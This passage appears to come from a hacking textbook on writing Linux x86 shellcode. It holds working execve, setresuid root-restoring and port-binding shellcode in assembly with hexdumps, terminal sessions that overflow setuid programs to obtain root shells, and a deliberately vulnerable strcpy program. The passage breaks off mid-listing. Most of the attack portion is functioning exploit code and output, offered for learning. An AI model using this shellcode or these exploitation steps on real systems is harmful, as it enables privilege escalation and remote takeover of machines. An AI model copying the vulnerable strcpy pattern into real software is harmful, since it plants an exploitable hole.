char filename[] = "/bin/sh\x00";

char *argv[2], *envp[1]; // Arrays that contain char pointers (with storage, so the writes below are valid)

argv[0] = filename; // The only argument is filename.

argv[1] = 0; // Null terminate the argument array.

envp[0] = 0; // Null terminate the environment array.

execve(filename, argv, envp);

}

To do this in assembly, the argument and environment arrays need to be built in memory. In addition, the "/bin/sh" string needs to be terminated with a null byte. This must be built in memory as well. Dealing with memory in assembly is similar to using pointers in C. The lea instruction, whose name stands for load effective address, works like the address-of operator in C.

Instruction              Description

lea <dest>, <source>     Load the effective address of the source operand into the destination operand.

With Intel assembly syntax, operands can be dereferenced as pointers if they are surrounded by square brackets. For example, the following instruction in assembly will treat EBX+12 as a pointer and write eax to where it's pointing.

89 43 0C mov [ebx+12],eax

The following shellcode uses these new instructions to build the execve() arguments in memory. The environment array is collapsed into the end of the argument array, so they share the same 32-bit null terminator.

exec_shell.s

BITS 32

jmp short two ; Jump down to the bottom for the call trick.

one:

; int execve(const char *filename, char *const argv [], char *const envp[])

pop ebx ; Ebx has the addr of the string.

xor eax, eax ; Put 0 into eax.

mov [ebx+7], al ; Null terminate the /bin/sh string.

mov [ebx+8], ebx ; Put addr from ebx where the AAAA is.

mov [ebx+12], eax ; Put 32-bit null terminator where the BBBB is.

lea ecx, [ebx+8] ; Load the address of [ebx+8] into ecx for argv ptr.

lea edx, [ebx+12] ; Edx = ebx + 12, which is the envp ptr.

mov al, 11 ; Syscall #11

int 0x80 ; Do it.

two:

call one ; Use a call to get string address.

db '/bin/shXAAAABBBB' ; The XAAAABBBB bytes aren't needed.

After terminating the string and building the arrays, the shellcode uses the lea instruction to put a pointer to the argument array into the ECX register. Loading the effective address of a bracketed register added to a value is an efficient way to add the value to the register and store the result in another register. In the example above, the brackets dereference EBX+8 as the argument to lea, which loads that address into ECX. Loading the address of a dereferenced pointer produces the original pointer, so this instruction puts EBX+8 into ECX; the second lea does the same with EBX+12 and EDX. Normally, this would require both a mov and an add instruction. When assembled, this shellcode is devoid of null bytes. It will spawn a shell when used in an exploit.
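The memory writes in exec_shell.s can be traced without running any shellcode. The following is only a sketch in Python: the function name build_execve_args and the address in STRING_ADDR are made up for illustration, standing in for whatever address the call instruction pushes at run time.

```python
import struct


def build_execve_args(ebx: int, data: bytes):
    """Replay the three stores and two lea instructions from exec_shell.s.

    ebx is the (hypothetical) address of the string; data is the 16 bytes
    that follow the call instruction.
    """
    mem = bytearray(data)
    mem[7] = 0                              # mov [ebx+7], al   (eax is zero)
    mem[8:12] = struct.pack("<I", ebx)      # mov [ebx+8], ebx
    mem[12:16] = struct.pack("<I", 0)       # mov [ebx+12], eax
    ecx = ebx + 8                           # lea ecx, [ebx+8]  -> argv
    edx = ebx + 12                          # lea edx, [ebx+12] -> envp
    return bytes(mem), ecx, edx


STRING_ADDR = 0xBFFFF9E5  # assumed address, for illustration only
mem, argv_ptr, envp_ptr = build_execve_args(STRING_ADDR, b"/bin/shXAAAABBBB")

if __name__ == "__main__":
    print(mem.hex(" "), hex(argv_ptr), hex(envp_ptr))
```

After the stores, the X has become the string's null terminator, AAAA holds the string's own address (argv[0]), and BBBB is the shared 32-bit null that ends argv and serves as the empty envp.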

reader@hacking:~/booksrc $ nasm exec_shell.s

reader@hacking:~/booksrc $ wc -c exec_shell

36 exec_shell

reader@hacking:~/booksrc $ hexdump -C exec_shell

00000000 eb 16 5b 31 c0 88 43 07 89 5b 08 89 43 0c 8d 4b |..[1..C..[..C..K|

00000010 08 8d 53 0c b0 0b cd 80 e8 e5 ff ff ff 2f 62 69 |..S........../bi|

00000020 6e 2f 73 68 |n/sh|

00000024

reader@hacking:~/booksrc $ export SHELLCODE=$(cat exec_shell)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch

SHELLCODE will be at 0xbffff9c0

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xc0\xf9\xff\xbf"x40')

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

[DEBUG] found a 5 byte note for user id 999

[DEBUG] found a 35 byte note for user id 999

[DEBUG] found a 9 byte note for user id 999

[DEBUG] found a 33 byte note for user id 999

-------[ end of note data ]-------

sh-3.2# whoami

root

sh-3.2#

This shellcode, however, can be shortened. As listed, with the XAAAABBBB placeholder at the end of the string, exec_shell.s assembles to 45 bytes. Since shellcode needs to be injected into program memory somewhere, smaller shellcode can be used in tighter exploit situations with smaller usable buffers. The smaller the shellcode, the more situations it can be used in. Obviously, the XAAAABBBB visual aid can be trimmed from the end of the string, which brings the shellcode down to 36 bytes.

reader@hacking:~/booksrc/shellcodes $ hexdump -C exec_shell

00000000 eb 16 5b 31 c0 88 43 07 89 5b 08 89 43 0c 8d 4b |..[1..C..[..C..K|

00000010 08 8d 53 0c b0 0b cd 80 e8 e5 ff ff ff 2f 62 69 |..S........../bi|

00000020 6e 2f 73 68 |n/sh|

00000024

reader@hacking:~/booksrc/shellcodes $ wc -c exec_shell

36 exec_shell

reader@hacking:~/booksrc/shellcodes $

This shellcode can be shrunk down further by redesigning it and using registers more efficiently. The ESP register is the stack pointer, pointing to the top of the stack. When a value is pushed to the stack, ESP is moved toward lower memory addresses (by subtracting 4) and the value is placed at the new top of the stack. When a value is popped from the stack, the pointer in ESP is moved back toward higher addresses (by adding 4).
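The push and pop behavior just described can be modeled in a few lines of Python. This is a sketch, not an emulator: the Stack class and its starting address are invented for illustration, and the three pushed values are the ones used by the tiny_shell.s listing in this section.

```python
import struct


class Stack:
    """Toy model of a 32-bit x86 stack (illustrative only)."""

    def __init__(self, esp=0xBFFFF800):  # assumed starting address
        self.esp = esp
        self.mem = {}

    def push(self, value):
        self.esp -= 4  # ESP moves to a lower address first
        for i, byte in enumerate(struct.pack("<I", value & 0xFFFFFFFF)):
            self.mem[self.esp + i] = byte  # little-endian store

    def read(self, addr, length):
        return bytes(self.mem[addr + i] for i in range(length))

    def pop(self):
        value = struct.unpack("<I", self.read(self.esp, 4))[0]
        self.esp += 4  # ESP moves back to a higher address
        return value


stack = Stack()
stack.push(0)            # push eax        (nulls for string termination)
stack.push(0x68732F2F)   # push 0x68732f2f ("//sh")
stack.push(0x6E69622F)   # push 0x6e69622f ("/bin")
string_at_esp = stack.read(stack.esp, 9)

if __name__ == "__main__":
    print(string_at_esp)
```

Because each dword is stored little-endian and each push lands below the previous one, the values must be pushed in reverse for the bytes to read forward in memory as "/bin//sh" followed by a null.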

The following shellcode uses push instructions to build the necessary structures in memory for the execve() system call.

tiny_shell.s

BITS 32

; execve(const char *filename, char *const argv [], char *const envp[])

xor eax, eax ; Zero out eax.

push eax ; Push some nulls for string termination.

push 0x68732f2f ; Push "//sh" to the stack.

push 0x6e69622f ; Push "/bin" to the stack.

mov ebx, esp ; Put the address of "/bin//sh" into ebx, via esp.

push eax ; Push 32-bit null terminator to stack.

mov edx, esp ; This is an empty array for envp.

push ebx ; Push string addr to stack above null terminator.

mov ecx, esp ; This is the argv array with string ptr.

mov al, 11 ; Syscall #11.

int 0x80 ; Do it.

This shellcode builds the null-terminated string "/bin//sh" on the stack, and then copies ESP for the pointer. The extra slash doesn't matter and is effectively ignored. The same method is used to build the arrays for the remaining arguments. The resulting shellcode still spawns a shell but is only 25 bytes, compared to 36 bytes using the jmp call method.

reader@hacking:~/booksrc $ nasm tiny_shell.s

reader@hacking:~/booksrc $ wc -c tiny_shell

25 tiny_shell

reader@hacking:~/booksrc $ hexdump -C tiny_shell

00000000 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 |1.Ph//shh/bin..P|

00000010 89 e2 53 89 e1 b0 0b cd 80 |..S......|

00000019

reader@hacking:~/booksrc $ export SHELLCODE=$(cat tiny_shell)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch

SHELLCODE will be at 0xbffff9cb

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xcb\xf9\xff\xbf"x40')

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

[DEBUG] found a 5 byte note for user id 999

[DEBUG] found a 35 byte note for user id 999

[DEBUG] found a 9 byte note for user id 999

[DEBUG] found a 33 byte note for user id 999

-------[ end of note data ]-------

sh-3.2#

A Matter of Privilege

To help mitigate rampant privilege escalation, some privileged processes will lower their effective privileges while doing things that don't require that kind of access. This can be done with the seteuid() function, which will set the effective user ID. By changing the effective user ID, the privileges of the process can be changed. The manual page for the seteuid() function is shown below.

SETEGID(2) Linux Programmer's Manual SETEGID(2)

NAME

seteuid, setegid - set effective user or group ID

SYNOPSIS

#include <sys/types.h>

#include <unistd.h>

int seteuid(uid_t euid);

int setegid(gid_t egid);

DESCRIPTION

seteuid() sets the effective user ID of the current process.

Unprivileged user processes may only set the effective user ID to the

real user ID, the effective user ID or the saved set-user-ID.

Precisely the same holds for setegid() with "group" instead of "user".

RETURN VALUE

On success, zero is returned. On error, -1 is returned, and errno is

set appropriately.

This function is used by the following code to drop privileges down to those of the "games" user before the vulnerable strcpy() call.

drop_privs.c

#include <string.h>

#include <unistd.h>

void lowered_privilege_function(unsigned char *ptr) {

char buffer[50];

seteuid(5); // Drop privileges to games user.

strcpy(buffer, ptr);

}

int main(int argc, char *argv[]) {

if (argc > 1) // argv[1] exists only when an argument was supplied.

lowered_privilege_function(argv[1]);

}

Even though this compiled program is setuid root, the privileges are dropped to the games user before the shellcode can execute. This only spawns a shell for the games user, without root access.

reader@hacking:~/booksrc $ gcc -o drop_privs drop_privs.c

reader@hacking:~/booksrc $ sudo chown root ./drop_privs; sudo chmod u+s ./drop_privs

reader@hacking:~/booksrc $ export SHELLCODE=$(cat tiny_shell)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./drop_privs

SHELLCODE will be at 0xbffff9cb

reader@hacking:~/booksrc $ ./drop_privs $(perl -e 'print "\xcb\xf9\xff\xbf"x40')

sh-3.2$ whoami

games

sh-3.2$ id

uid=999(reader) gid=999(reader) euid=5(games) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),112(netdev),113(lpadmin),115(powerdev),117(admin),999(reader)

sh-3.2$

Fortunately, the privileges can easily be restored at the beginning of our shellcode with a system call to set the privileges back to root. The most complete way to do this is with a setresuid() system call, which sets the real, effective, and saved user IDs. The system call number and manual page are shown below.

reader@hacking:~/booksrc $ grep -i setresuid /usr/include/asm-i386/unistd.h

#define __NR_setresuid 164

#define __NR_setresuid32 208

reader@hacking:~/booksrc $ man 2 setresuid

SETRESUID(2) Linux Programmer's Manual SETRESUID(2)

NAME

setresuid, setresgid - set real, effective and saved user or group ID

SYNOPSIS

#define _GNU_SOURCE

#include <unistd.h>

int setresuid(uid_t ruid, uid_t euid, uid_t suid);

int setresgid(gid_t rgid, gid_t egid, gid_t sgid);

DESCRIPTION

setresuid() sets the real user ID, the effective user ID, and the saved

set-user-ID of the current process.

The following shellcode makes a call to setresuid() before spawning the shell to restore root privileges.

priv_shell.s

BITS 32

; setresuid(uid_t ruid, uid_t euid, uid_t suid);

xor eax, eax ; Zero out eax.

xor ebx, ebx ; Zero out ebx.

xor ecx, ecx ; Zero out ecx.

xor edx, edx ; Zero out edx.

mov al, 0xa4 ; 164 (0xa4) for syscall #164

int 0x80 ; setresuid(0, 0, 0) Restore all root privs.

; execve(const char *filename, char *const argv [], char *const envp[])

xor eax, eax ; Make sure eax is zeroed again.

mov al, 11 ; syscall #11

push ecx ; push some nulls for string termination.

push 0x68732f2f ; push "//sh" to the stack.

push 0x6e69622f ; push "/bin" to the stack.

mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp.

push ecx ; push 32-bit null terminator to stack.

mov edx, esp ; This is an empty array for envp.

push ebx ; push string addr to stack above null terminator.

mov ecx, esp ; This is the argv array with string ptr.

int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

This way, even if a program is running under lowered privileges when it's exploited, the shellcode can restore the privileges. This effect is demonstrated below by exploiting the same program with dropped privileges.

reader@hacking:~/booksrc $ nasm priv_shell.s

reader@hacking:~/booksrc $ export SHELLCODE=$(cat priv_shell)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./drop_privs

SHELLCODE will be at 0xbffff9bf

reader@hacking:~/booksrc $ ./drop_privs $(perl -e 'print "\xbf\xf9\xff\xbf"x40')

sh-3.2# whoami

root

sh-3.2# id

uid=0(root) gid=999(reader) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),112(netdev),113(lpadmin),115(powerdev),117(admin),999(reader)

sh-3.2#
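Why setresuid(0, 0, 0) succeeds after the privileges were dropped comes down to the saved set-user-ID, which seteuid() leaves untouched. The following Python model is a simplified sketch of the rules quoted from the manual pages above. The Creds class is hypothetical, "privileged" is approximated as an effective user ID of 0, and the -1 "leave unchanged" argument of the real call is not modeled.

```python
class Creds:
    """Toy model of a process's real, effective, and saved user IDs."""

    def __init__(self, ruid, euid, suid):
        self.ruid, self.euid, self.suid = ruid, euid, suid

    def _allowed(self, uid):
        # Assumption: euid 0 may pick any ID; anyone else may only pick
        # one of the three IDs the process already holds.
        return self.euid == 0 or uid in (self.ruid, self.euid, self.suid)

    def seteuid(self, euid):
        if not self._allowed(euid):
            return -1
        self.euid = euid  # real and saved IDs are left alone
        return 0

    def setresuid(self, ruid, euid, suid):
        if not all(self._allowed(uid) for uid in (ruid, euid, suid)):
            return -1
        self.ruid, self.euid, self.suid = ruid, euid, suid
        return 0

    def ids(self):
        return (self.ruid, self.euid, self.suid)


# drop_privs is setuid root and run by reader (uid 999):
proc = Creds(ruid=999, euid=0, suid=0)
proc.seteuid(5)                       # seteuid(5) in drop_privs.c
after_drop = proc.ids()
restore_result = proc.setresuid(0, 0, 0)   # what priv_shell.s does
after_restore = proc.ids()

# An ordinary process with no root ID saved anywhere cannot do the same:
plain = Creds(999, 999, 999)
plain_result = plain.setresuid(0, 0, 0)
```

In this model the dropped process still carries 0 as its saved ID, which is what lets the shellcode climb back to root; a process that never held root has nothing to restore.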

And Smaller Still

A few more bytes can still be shaved off this shellcode. There is a single-byte x86 instruction called cdq, which stands for convert doubleword to quadword. Instead of using operands, this instruction always gets its source from the EAX register and stores the result across the EDX and EAX registers. Since the registers are 32-bit doublewords, it takes two registers to store a 64-bit quadword. The conversion is simply a matter of extending the sign bit from a 32-bit integer to a 64-bit integer. Operationally, this means if the sign bit of EAX is 0, the cdq instruction will zero the EDX register. Using xor to zero the EDX register requires two bytes; so, if EAX is already zeroed, using the cdq instruction to zero EDX will save one byte:

31 D2 xor edx,edx

compared to

99 cdq
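The effect of cdq on EDX can be stated as a one-line rule. As a small sketch in Python (the function simply mirrors the sign-extension described above, it is not an emulator):

```python
def cdq(eax: int) -> int:
    """Return the value cdq leaves in EDX for a given 32-bit EAX."""
    eax &= 0xFFFFFFFF
    # EDX is filled with copies of EAX's sign bit (bit 31).
    return 0xFFFFFFFF if eax & 0x80000000 else 0x00000000


if __name__ == "__main__":
    for value in (0x00000000, 0x000000A4, 0x80000000):
        print(hex(value), "->", hex(cdq(value)))
```

The trick is only safe when the sign bit of EAX is known to be clear, as it is right after xor eax, eax or after loading a small positive syscall number.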

Another byte can be saved with clever use of the stack. Since the stack is 32-bit aligned, a single byte value pushed to the stack will be aligned as a doubleword. The byte is sign-extended to fill that doubleword, so when it is popped off, it fills the entire register. The instructions that push a single byte and pop it back into a register take three bytes, while using xor to zero the register and moving a single byte takes four bytes:

31 C0 xor eax,eax

B0 0B mov al,0xb

compared to

6A 0B push byte +0xb

58 pop eax
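Because the pushed byte is sign-extended, the push/pop trick only yields the intended value for bytes below 0x80. A rough Python sketch of the rule (the function name is invented for this example):

```python
def push_byte_pop(imm8: int) -> int:
    """32-bit register value after `push BYTE imm8` followed by `pop reg`."""
    imm8 &= 0xFF
    # Bit 7 of the byte is copied into the upper 24 bits.
    return (imm8 | 0xFFFFFF00) if imm8 & 0x80 else imm8


if __name__ == "__main__":
    for value in (0x0B, 0x66, 0xA4):
        print(hex(value), "->", hex(push_byte_pop(value)))
```

Under this rule, 11 (execve) and 0x66 (socketcall) load cleanly, while 0xa4 (setresuid) would come back as 0xffffffa4, so a value like that still needs a zeroed register and a mov into AL.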

These tricks are used in the following shellcode listing, in the cdq instruction and the push BYTE / pop eax pair. This assembles into the same shellcode as that used in the previous chapters.

shellcode.s

BITS 32

; setresuid(uid_t ruid, uid_t euid, uid_t suid);

xor eax, eax ; Zero out eax.

xor ebx, ebx ; Zero out ebx.

xor ecx, ecx ; Zero out ecx.

cdq ; Zero out edx using the sign bit from eax.

mov BYTE al, 0xa4 ; syscall 164 (0xa4)

int 0x80 ; setresuid(0, 0, 0) Restore all root privs.

; execve(const char *filename, char *const argv [], char *const envp[])

push BYTE 11 ; push 11 to the stack.

pop eax ; pop the dword of 11 into eax.

push ecx ; push some nulls for string termination.

push 0x68732f2f ; push "//sh" to the stack.

push 0x6e69622f ; push "/bin" to the stack.

mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp.

push ecx ; push 32-bit null terminator to stack.

mov edx, esp ; This is an empty array for envp.

push ebx ; push string addr to stack above null terminator.

mov ecx, esp ; This is the argv array with string ptr.

int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

The syntax for pushing a single byte requires the size to be declared. Valid sizes are BYTE for one byte, WORD for two bytes, and DWORD for four bytes. These sizes can be implied from register widths, so moving into the AL register implies the BYTE size. While it's not necessary to use a size in all situations, it doesn't hurt and can help readability.

Port-Binding Shellcode

When exploiting a remote program, the shellcode we've designed so far won't work. The injected shellcode needs to communicate over the network to deliver an interactive root prompt. Port-binding shellcode will bind the shell to a network port where it listens for incoming connections. In the previous chapter, we used this kind of shellcode to exploit the tinyweb server. The following C code binds to port 31337 and listens for a TCP connection.

bind_port.c

#include <unistd.h>

#include <string.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

int main(void) {

int sockfd, new_sockfd; // Listen on sockfd, new connection on new_sockfd

struct sockaddr_in host_addr, client_addr; // My address information

socklen_t sin_size;

int yes=1;

sockfd = socket(PF_INET, SOCK_STREAM, 0);

host_addr.sin_family = AF_INET; // Host byte order

host_addr.sin_port = htons(31337); // Short, network byte order

host_addr.sin_addr.s_addr = INADDR_ANY; // Automatically fill with my IP.

memset(&(host_addr.sin_zero), '\0', 8); // Zero the rest of the struct.

bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));

listen(sockfd, 4);

sin_size = sizeof(struct sockaddr_in);

new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);

}

These familiar socket functions can all be accessed with a single Linux system call, aptly named socketcall(). This is syscall number 102, which has a slightly cryptic manual page.

reader@hacking:~/booksrc $ grep socketcall /usr/include/asm-i386/unistd.h

#define __NR_socketcall 102

reader@hacking:~/booksrc $ man 2 socketcall

IPC(2) Linux Programmer's Manual IPC(2)

NAME

socketcall - socket system calls

SYNOPSIS

int socketcall(int call, unsigned long *args);

DESCRIPTION

socketcall() is a common kernel entry point for the socket system calls. call

determines which socket function to invoke. args points to a block containing

the actual arguments, which are passed through to the appropriate call.

User programs should call the appropriate functions by their usual

names. Only standard library implementors and kernel hackers need to

know about socketcall().

The possible call numbers for the first argument are listed in the linux/net.h include file.

From /usr/include/linux/net.h

#define SYS_SOCKET 1 /* sys_socket(2) */

#define SYS_BIND 2 /* sys_bind(2) */

#define SYS_CONNECT 3 /* sys_connect(2) */

#define SYS_LISTEN 4 /* sys_listen(2) */

#define SYS_ACCEPT 5 /* sys_accept(2) */

#define SYS_GETSOCKNAME 6 /* sys_getsockname(2) */

#define SYS_GETPEERNAME 7 /* sys_getpeername(2) */

#define SYS_SOCKETPAIR 8 /* sys_socketpair(2) */

#define SYS_SEND 9 /* sys_send(2) */

#define SYS_RECV 10 /* sys_recv(2) */

#define SYS_SENDTO 11 /* sys_sendto(2) */

#define SYS_RECVFROM 12 /* sys_recvfrom(2) */

#define SYS_SHUTDOWN 13 /* sys_shutdown(2) */

#define SYS_SETSOCKOPT 14 /* sys_setsockopt(2) */

#define SYS_GETSOCKOPT 15 /* sys_getsockopt(2) */

#define SYS_SENDMSG 16 /* sys_sendmsg(2) */

#define SYS_RECVMSG 17 /* sys_recvmsg(2) */

So, to make socket system calls using Linux, EAX is always 102 for socketcall(), EBX contains the type of socket call, and ECX is a pointer to the socket call's arguments. The calls are simple enough, but some of them require a sockaddr structure, which must be built by the shellcode. Debugging the compiled C code is the most direct way to look at this structure in memory.

reader@hacking:~/booksrc $ gcc -g bind_port.c

reader@hacking:~/booksrc $ gdb -q ./a.out

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) list 18

13 sockfd = socket(PF_INET, SOCK_STREAM, 0);

14

15 host_addr.sin_family = AF_INET; // Host byte order

16 host_addr.sin_port = htons(31337); // Short, network byte order

17 host_addr.sin_addr.s_addr = INADDR_ANY; // Automatically fill with my IP.

18 memset(&(host_addr.sin_zero), '\0', 8); // Zero the rest of the struct.

19

20 bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));

21

22 listen(sockfd, 4);

(gdb) break 13

Breakpoint 1 at 0x804849b: file bind_port.c, line 13.

(gdb) break 20

Breakpoint 2 at 0x80484f5: file bind_port.c, line 20.

(gdb) run

Starting program: /home/reader/booksrc/a.out

Breakpoint 1, main () at bind_port.c:13

13 sockfd = socket(PF_INET, SOCK_STREAM, 0);

(gdb) x/5i $eip

0x804849b <main+23>: mov DWORD PTR [esp+8],0x0

0x80484a3 <main+31>: mov DWORD PTR [esp+4],0x1

0x80484ab <main+39>: mov DWORD PTR [esp],0x2

0x80484b2 <main+46>: call 0x8048394 <socket@plt>

0x80484b7 <main+51>: mov DWORD PTR [ebp-12],eax

(gdb)

The first breakpoint is just before the socket call happens, since we need to check the values of PF_INET and SOCK_STREAM. All three arguments are pushed to the stack (but with mov instructions) in reverse order. This means PF_INET is 2 and SOCK_STREAM is 1.

(gdb) cont

Continuing.

Breakpoint 2, main () at bind_port.c:20

20 bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));

(gdb) print host_addr

$1 = {sin_family = 2, sin_port = 27002, sin_addr = {s_addr = 0},

sin_zero = "\000\000\000\000\000\000\000"}

(gdb) print sizeof(struct sockaddr)

$2 = 16

(gdb) x/16xb &host_addr

0xbffff780: 0x02 0x00 0x7a 0x69 0x00 0x00 0x00 0x00

0xbffff788: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

(gdb) p /x 27002

$3 = 0x697a

(gdb) p 0x7a69

$4 = 31337

(gdb)

The next breakpoint happens after the sockaddr structure is filled with values. The debugger is smart enough to decode the elements of the structure when host_addr is printed, but now you need to be smart enough to realize the port is stored in network byte order. The sin_family and sin_port elements are both words, followed by the address as a DWORD. In this case, the address is 0, which means any address can be used for binding. The remaining eight bytes after that are just extra space in the structure. The first eight bytes in the structure (0x02 0x00 0x7a 0x69 followed by four zero bytes) contain all the important information.
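The byte layout seen in the debugger can be reproduced with Python's struct module. This is a sketch under the assumption of a little-endian x86 host; pack_sockaddr_in is a made-up helper, not a library function.

```python
import struct


def pack_sockaddr_in(port: int, addr: int = 0, family: int = 2) -> bytes:
    """Lay out a 16-byte sockaddr_in the way it appears in x86 memory."""
    return (
        struct.pack("<H", family)   # sin_family: host (little-endian) order
        + struct.pack(">H", port)   # sin_port: network (big-endian) order
        + struct.pack(">I", addr)   # sin_addr: network order, 0 = INADDR_ANY
        + b"\x00" * 8               # sin_zero padding
    )


host_addr = pack_sockaddr_in(31337)

# Reading the two port bytes back as a little-endian word gives the
# value gdb printed for sin_port.
port_as_x86_word = struct.unpack("<H", host_addr[2:4])[0]

if __name__ == "__main__":
    print(host_addr.hex(" "))
    print(port_as_x86_word, hex(port_as_x86_word))
```

The port bytes 0x7a 0x69 are stored most significant byte first, which is why a little-endian machine reads them as 0x697a (27002) even though the port is 31337.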

The following assembly instructions perform all the socket calls needed to bind to port 31337 and accept TCP connections. The sockaddr structure and the argument arrays are each created by pushing values in reverse order to the stack and then copying ESP into ECX. The last eight bytes of the sockaddr structure aren't actually pushed to the stack, since they aren't used. Whatever random eight bytes happen to be on the stack will occupy this space, which is fine.

bind_port.s

BITS 32

; s = socket(2, 1, 0)

push BYTE 0x66 ; socketcall is syscall #102 (0x66).

pop eax

cdq ; Zero out edx for use as a null DWORD later.

xor ebx, ebx ; ebx is the type of socketcall.

inc ebx ; 1 = SYS_SOCKET = socket()

push edx ; Build arg array: { protocol = 0,

push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1,

push BYTE 0x2 ; AF_INET = 2 }

mov ecx, esp ; ecx = ptr to argument array

int 0x80 ; After syscall, eax has socket file descriptor.

mov esi, eax ; save socket FD in esi for later

; bind(s, [2, 31337, 0], 16)

push BYTE 0x66 ; socketcall (syscall #102)

pop eax

inc ebx ; ebx = 2 = SYS_BIND = bind()

push edx ; Build sockaddr struct: INADDR_ANY = 0

push WORD 0x697a ; (in reverse order) PORT = 31337

push WORD bx ; AF_INET = 2

mov ecx, esp ; ecx = server struct pointer

push BYTE 16 ; argv: { sizeof(server struct) = 16,

push ecx ; server struct pointer,

push esi ; socket file descriptor }

mov ecx, esp ; ecx = argument array

int 0x80 ; eax = 0 on success

; listen(s, 4)

mov BYTE al, 0x66 ; socketcall (syscall #102)

inc ebx

inc ebx ; ebx = 4 = SYS_LISTEN = listen()

push ebx ; argv: { backlog = 4,

push esi ; socket fd }

mov ecx, esp ; ecx = argument array

int 0x80

; c = accept(s, 0, 0)

mov BYTE al, 0x66 ; socketcall (syscall #102)

inc ebx ; ebx = 5 = SYS_ACCEPT = accept()

push edx ; argv: { socklen = 0,

push edx ; sockaddr ptr = NULL,

push esi ; socket fd }

mov ecx, esp ; ecx = argument array

int 0x80 ; eax = connected socket FD

When assembled and used in an exploit, this shellcode will bind to port 31337 and wait for an incoming connection, blocking at the accept call. When a connection is accepted, the new socket file descriptor is put into EAX at the end of this code. This won't really be useful until it's combined with the shell-spawning code described earlier. Fortunately, standard file descriptors make this fusion remarkably simple.
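The reverse-order pushes in bind_port.s are easier to follow when the resulting memory is written out. Below is a rough Python sketch (pushed_bytes is a hypothetical helper) that computes the bytes sitting at ESP after a sequence of 16-bit and 32-bit pushes.

```python
import struct

# Call numbers taken from the linux/net.h excerpt above.
SYS_SOCKET, SYS_BIND, SYS_LISTEN, SYS_ACCEPT = 1, 2, 4, 5


def pushed_bytes(*pushes):
    """Memory starting at the final ESP after the given pushes.

    pushes are (value, size_in_bytes) pairs in program order.
    """
    formats = {2: "<H", 4: "<I"}
    mem = b""
    for value, size in pushes:
        # Each push lands just below (in front of) the previous one.
        mem = struct.pack(formats[size], value) + mem
    return mem


# push edx ; push BYTE 0x1 ; push BYTE 0x2   (byte pushes occupy a dword)
socket_args = pushed_bytes((0, 4), (1, 4), (2, 4))

# push edx ; push WORD 0x697a ; push WORD bx   (bx = 2)
sockaddr_head = pushed_bytes((0, 4), (0x697A, 2), (2, 2))

if __name__ == "__main__":
    print(struct.unpack("<3I", socket_args))
    print(sockaddr_head.hex(" "))
```

Read forward from ESP, the first array is {2, 1, 0}, the argument order socket() expects, and the second is the same eight bytes gdb showed at the start of host_addr.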

Duplicating Standard File Descriptors

Standard input, standard output, and standard error are the three standard file descriptors used by programs to perform standard I/O. Sockets, too, are just file descriptors that can be read from and written to. By simply swapping the standard input, output, and error of the spawned shell with the connected socket file descriptor, the shell will write output and errors to the socket and read its input from the bytes that the socket received. There is a system call specifically for duplicating file descriptors, called dup2. This is system call number 63.

reader@hacking:~/booksrc $ grep dup2 /usr/include/asm-i386/unistd.h

#define __NR_dup2 63

reader@hacking:~/booksrc $ man 2 dup2

DUP(2) Linux Programmer's Manual DUP(2)

NAME

dup, dup2 - duplicate a file descriptor

SYNOPSIS

#include <unistd.h>

int dup(int oldfd);

int dup2(int oldfd, int newfd);

DESCRIPTION

dup() and dup2() create a copy of the file descriptor oldfd.

dup2() makes newfd be the copy of oldfd, closing newfd first if necessary.
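The behavior of dup2() is easy to observe with two pipes, without touching the real standard descriptors. A minimal sketch using Python's os module, which wraps the same system call:

```python
import os

# Two independent pipes; each is a (read_fd, write_fd) pair.
r1, w1 = os.pipe()
r2, w2 = os.pipe()

# Make w2 a copy of w1. dup2 closes whatever w2 referred to first,
# so from here on w2 is a second handle on the first pipe.
os.dup2(w1, w2)

os.write(w2, b"hello")      # written through the duplicated descriptor
received = os.read(r1, 5)   # arrives on the first pipe's read end

for fd in (r1, w1, r2, w2):
    os.close(fd)

if __name__ == "__main__":
    print(received)
```

Replacing descriptors 0, 1, and 2 with a connected socket works the same way: anything that later reads or writes those numbers is talking to the socket instead.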

The bind_port.s shellcode left off with the connected socket file descriptor in EAX. The following instructions are added in the file bind_shell_beta.s to duplicate this socket into the standard I/O file descriptors; then, the tiny_shell instructions are called to execute a shell in the current process. The spawned shell's standard input and output file descriptors will be the TCP connection, allowing remote shell access.

New Instructions from bind_shell_beta.s

; dup2(connected socket, {all three standard I/O file descriptors})

mov ebx, eax ; Move socket FD in ebx.

push BYTE 0x3F ; dup2 syscall #63

pop eax

xor ecx, ecx ; ecx = 0 = standard input

int 0x80 ; dup2(c, 0)

mov BYTE al, 0x3F ; dup2 syscall #63

inc ecx ; ecx = 1 = standard output

int 0x80 ; dup2(c, 1)

mov BYTE al, 0x3F ; dup2 syscall #63

inc ecx ; ecx = 2 = standard error

int 0x80 ; dup2(c, 2)

; execve(const char *filename, char *const argv [], char *const envp[])

mov BYTE al, 11 ; execve syscall #11

push edx ; push some nulls for string termination.

push 0x68732f2f ; push "//sh" to the stack.

push 0x6e69622f ; push "/bin" to the stack.

mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp.

